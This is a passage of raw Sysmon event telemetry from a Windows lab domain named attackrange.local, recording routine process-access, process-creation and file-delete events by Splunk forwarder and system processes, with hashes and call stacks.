Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809411Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.833{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20CE7151493F53D5DB3B040B893706B1,SHA256=4CFBFE593CAB7E3FD63BDB5069C277236EEA2F04FBC42B66035455361BD45222,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809410Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.724{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAB179748012E7C55210E3DE6DFBD5C5,SHA256=ED3CEA18504E0C5ADAC1B6EACB87853D84A3358E3844A46E983CA391111DD875,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:26.132{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3363D755CE522F39DA557C4E4044575B,SHA256=82ECBE1C649868969344B9182AC168134FA90F3BD1A4010E5B971DC19A57EC54,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000809409Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.302{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F712-60EB-BC79-00000000D001}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809408Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809407Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809406Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809405Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809404Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809403Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809402Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809401Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809400Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.286{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809399Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:26.286{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F712-60EB-BC79-00000000D001}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809398Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.286{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F712-60EB-BC79-00000000D001}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809397Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.287{0C1E0330-F712-60EB-BC79-00000000D001}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:27.148{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2FD44B16D2246AB13BCEB9899F09F99,SHA256=92EF3719BF2734DE87B0FE598010F53A9B959DC7A10A85402F99FBBA17C1CCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809440Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.708{0C1E0330-F713-60EB-BE79-00000000D001}5003816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809439Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:27.567{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F713-60EB-BE79-00000000D001}500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809438Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809437Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809436Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809435Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809434Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809433Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809432Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809431Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809430Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 